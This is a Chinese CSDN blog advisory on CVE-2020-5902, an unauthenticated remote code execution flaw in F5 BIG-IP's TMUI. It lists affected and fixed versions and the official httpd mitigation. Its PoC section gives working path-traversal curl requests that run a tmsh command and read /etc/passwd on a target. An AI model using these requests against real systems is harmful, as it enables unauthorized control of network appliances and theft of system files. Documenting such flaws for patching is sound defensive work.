curl等待页面执行几秒_F5 BIG-IP 远程代码执行漏洞 - CVE-2020-5902

最新推荐文章于 2023-01-05 13:31:20 发布
最新推荐文章于 2023-01-05 13:31:20 发布
阅读量178 收藏
点赞数
文章标签: curl等待页面执行几秒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36033417/article/details/112078074
版权
9a4fca726bf15cbdb18ab0d6240eaa3f.png

0x01 前言

2020年07月03日, F5发布了F5 BIG-IP 远程代码执行的风险通告。

F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。

在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。

0x02 漏洞详情

未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。该漏洞影响控制面板受影响,不影响数据面板。

0x03 漏洞编号

CVE-2020-5902

0x04 影响版本

  • BIG-IP 15.x: 15.1.0/15.0.0
  • BIG-IP 14.x: 14.1.0 ~ 14.1.2
  • BIG-IP 13.x: 13.1.0 ~ 13.1.3
  • BIG-IP 12.x: 12.1.0 ~ 12.1.5
  • BIG-IP 11.x: 11.6.1 ~ 11.6.5

0x05 漏洞验证

cfa5de83ba7fc7d703434c8e5d821e40.png

0x06 Poc

GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=AnyMsgHereWillBeReflectedInTheResponseRCE: curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'Read File: curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

0x7 修复建议

升级到以下版本

  • BIG-IP 15.x: 15.1.0.4
  • BIG-IP 14.x: 14.1.2.6
  • BIG-IP 13.x: 13.1.3.4
  • BIG-IP 12.x: 12.1.5.2
  • BIG-IP 11.x: 11.6.5.2

临时修复建议:

官方建议可以通过以下步骤临时缓解影响

1) 使用以下命令登录对应系统

tmsh

2) 编辑 httpd 组件的配置文件

edit /sys httpd all-properties

3) 文件内容如下

include 'Redirect 404 /'

4) 按照如下操作保存文件

按下 ESC 并依次输入:wq

5) 执行命令刷新配置文件

save /sys config

6) 重启 httpd 服务

restart sys service httpd

并禁止外部IP对 TMUI 页面的访问

橙湖工作室
关注
F5 BIG-IP TMUI 远程代码执行(CVE-2020-5902)
mei_13的博客
07-08 642
1.1 漏洞描述: 在F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2020年7月1日,F5官方公布流量管理用户界面(TMUI)存在 前台远程执行代码(RCE)漏洞CVE-2020-5902)。攻击者利用该漏洞,构造恶意请求,在未授权的情况下通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。 1.2 影响范围
F5 BIG-IP远程代码执行漏洞(CVE-2020-5902)复现
m0_48520508的博客
11-18 1274
0x00简介 F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 在F5 BIG-IP产品的流量管理用户页面 (TMUI)/配置程序的特定页面中存在一处远程代码执行漏洞,导致可以未授权访问TMUI模块所有功能(包括未公开功能),漏洞影响范围包括执行任意系统命令、任意文件读取、任意文件写入、开启/禁用服务等。 0x02漏洞概述 攻击者可利用该漏洞执行任意系统命令、创建或删除文件、禁用服务、执行任意的Java代码,可获取sh
curl 等待一秒打印结果_Curl命令分析接口耗时
weixin_39869733的博客
01-12 1174
Curl是一个非常实用的,用来与服务器之间传输数据的工具,支持的协议包括 (DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP),Curl设计为无用户交互下完成...
curl 302重定向_使用curl创建简单的性能监控工具
weixin_39685024的博客
11-27 230
cURL,全称Command Line URL viewer,是一种命令行工具,用来发送网络请求,然后得到和提取数据,显示在标准输出(stdout)。我们可以使用curl来获取网页的源码,显示头信息,显示通讯过程等。在做基于http的接口测试的时候,curl基本上可以完成postman所具备的大部分功能,如果你习惯于使用命令行,那么curl是一个非常有用且常用的工具。CURL的基本使用查看网页源码...
windows 安装electron慢的解决方法
sinat_41292836的博客
07-29 640
在C:\Users\xx\.npmrc文件中添加electron淘宝镜像 ELECTRON_MIRROR="https://cdn.npm.taobao.org/dist/electron/" 没有这个文件就自己创建一个
curl等待页面执行几秒_CVE-2020-5902F5 BIG-IP 远程代码执行漏洞复现
weixin_35364187的博客
12-20 221
0x01 简介F5 BIGIP 链路控制器用于最大限度提升链路性能与可用性的下一代广域网链路流量管理。0x02 漏洞概述漏洞编号:CVE-2020-5902。未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。该漏洞影响控制面板受影响,不影响数据面板...
php curl请求等待时间,使用Curl命令查看请求响应时间方法
weixin_39642761的博客
03-10 1005
curl命令查看请求响应时间# curl -o /dev/null -s -w %{time_namelookup}::%{time_connect}::%{time_starttransfer}::%{time_total}::%{speed_download}"\n"http://www.php.cn0.014::0.015::0.018::0.019::1516256.00-o:把curl ...
F5 BIG-IP IQ 2021漏洞CVE-2021-22986:远程代码执行风险
### CVE-2021-22986: F5 BIG-IP-IQ 的远程代码执行漏洞分析 **背景**: CVE-2021-22986是一个针对F5 BIG-IP设备及其附属产品BIG-IP IQ(Intelligence Query)的安全漏洞。该漏洞允许攻击者通过不安全的API调用,...
F5 BIG-IP 远程代码执行漏洞(CVE-2020-5902) 附 shodan语法
scrooge51的博客
07-07 1160
漏洞原理 未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。该漏洞影响控制面板受影响,不影响数据面板。 影响版本 BIG-IP 15.x: 15.1.0/15.0.0 BIG-IP 14.x: 14.1.0 ~ 14.1.2 BIG-IP 13.x: 13.1.0 ~ 13.1.3 BIG-IP 12.x: 12.1.0 ~ 12.1.5 BIG-IP 11
记一次BIGIP Configuration Utility渗透.pdf
最新发布
04-22
CVE-2020-5902是一个影响BIG-IP Configuration Utility的重要漏洞,它允许未经身份验证的远程攻击者利用Tomcat中的URL解析缺陷来绕过权限检查,从而实现未授权访问和命令执行等功能。 **2. 利用方式** - **利用原理...
curl 等待一秒打印结果_文件半天搜不到,教你如何一秒搜索
weixin_34597791的博客
01-12 127
文件半天搜不到,教你如何一秒搜索相信很多人都有这样的痛苦,存在电脑上的文件突然就想不起来放在哪里了。只能打开电脑上的文件管理器。自带检索等待中但是相信用过电脑自带搜索工具的人都会感到绝望,在文件找不到的焦虑中苦苦等待,可能最后等来的还是一场空。今天,我就给大家带来了一款工具,彻底打破这个噩梦。软件官网Everything是当之无愧的最强文件搜索神器,以在闪电般的瞬间从海量的硬盘中找到你需要的文件...
RCE(命令执行)总结
leekos的博客,分享web安全相关知识~
01-05 2927
RCE(命令执行)总结
常用的curl命令及参数详解
热门推荐
分享传递价值
10-23 5万+
前言:经常需要用到curl命令在线上机器中去测试接口,尤其是一些内外网接口、判断线上接口信息等,需要用到curl命令直接测试页面或接口返回值,下面是我常用的curl命令参数及作用: 1、curl  url 作用:获取页面内容或接口响应 示例:以爱奇艺视频页领取优惠券为例:curl  https://act.vip.iqiyi.com/api/process.action?cb=cb_1540...
如何透过F5探测后端应用健康状态?
weixin_33937913的博客
08-23 1874
环境说明前端F5基于cookie插入的会话保持,后端有50台应用服务器。起 因一朋友运维的系统在生产环境中遇到了一些异常,为了排查故障,准备从最前端(互联网)检测F5后端的50台应用是否正常。(为什么没在内网检测?一开始我也想问,内网检控是有的,但由于环境比较复杂,没有那种从客户端一直到服务器的状态监测,不知道哪段出了问题。好吧,反正就让我做个从互联网端发起的探测。)脚本分析...
F5的HTTP monitor机制-URL检测-http-restAPI侦测
呼吸的小鱼博客
12-01 5563
一、restAPI接口返回的消息必须是字符串格式: 返回的响应字符串要不能带引号,我查了下资料,需要在servlet-context.xml添加<bean class="org.springframework.http.converter.StringHttpMessageConverter"/>,加上后在命令行curl 时确实不带引号了 <mvc:annotation-dr...
关于F5 排错的简单介绍之一
weixin_33754913的博客
11-02 409
我只是每天抽出几分钟,写写自己想到的东西。有时间会进行修正。 F5 是一直专注于4到7层,但是ping F5上某个IP 总丢包,总和F5 有点关系吧,哈哈~,说这话,想必做过F5的人,都有点苦逼了吧。所以,排错F5 还是要从1到7层一点一点的去找问题。当然如果你是大神,定位准确无话可说。 首先确定问题到底属于哪一层。 ping命令是检测三层一下的有效工具,很多人经常...
curl的超时时间设置
编码无悔
06-21 2万+
使用curl时,有两个超时时间:一个是连接超时时间,另一个是最大允许时间。连接超时时间用 --connect-timeout 参数来指定,最大允许时间用 -m 参数来指定。例如:curl --connect-timeout 10 -m 20 "http://XXXXXXX"连接超时的话,出错提示形如:curl: (28) connect() timed out!最大允许时间超时的话,出错提示形如:curl: (28) Operation timed out after 2000 milliseconds w
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值